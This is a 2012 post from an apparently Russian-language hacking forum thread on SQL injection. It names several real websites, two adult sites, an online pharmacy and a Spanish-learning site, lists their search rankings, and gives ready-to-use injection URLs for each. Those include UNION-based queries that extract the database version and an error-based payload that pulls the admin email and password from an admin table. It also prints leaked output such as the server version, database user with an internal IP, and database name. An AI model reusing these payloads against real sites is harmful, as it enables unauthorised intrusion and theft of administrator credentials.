Тема: SQL Инъекции
Показать сообщение отдельно

  #6  
Старый 19.07.2012, 22:19
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
MySQL: GET SQLi, параметр 'mode' в URL:http://www.sunporno.com/login.php

Яндекс тИЦ (CY): 10

Google PageRank (PR): 4/10

Цитата:
Сообщение от None  
http://www.sunporno.com/login.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
VERSION()

Цитата:
Сообщение от None  
5.5.23-log
USER()

Цитата:
Сообщение от None  
sunporno_db@192.168.1.3
DATABASE()

Цитата:
Сообщение от None  
sunporno_db
Еще одна порнушка (тот же вектор)

MySQL: GET SQLi, параметр 'mode' в URL:http://www.ah-me.com/channels.php

Яндекс тИЦ (CY): 0

Google PageRank (PR): 3/10

Цитата:
Сообщение от None  
http://www.ah-me.com/channels.php?mode=-6337%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C %20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6d76 793a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%2 9%2C0x20%29%2C0x3a73716d3a%29%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL% 2C%20NULL%23
MySQL: Error-based Duplicate entry GET SQLi в URL:http://piluli.ru/

Яндекс тИЦ (CY): 600

Google PageRank (PR): 4/10

сложная кэш скуля, вместо [random_string] любые символы, с каждым запросом новые

Цитата:
Сообщение от None  
http://piluli.ru/?[random_string]'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/concat(admin_email_address,';',admin_password)/**/from/**/admin/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
MySQL: GET SQLi параметр 'letter' в URL:http://www.classes.ru/all-spanish/

Яндекс тИЦ (CY): 475

Google PageRank (PR): 2/10

Цитата:
Сообщение от None  
http://www.classes.ru/all-spanish/?letter=1%27%20LIMIT%201%2C1%20UNION%20ALL%20SELEC T%20NULL%2C%20CONCAT%280x3a7078683a%2CIFNULL%28CAS T%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a7 16f6d3a%29%23
 
Ответить с цитированием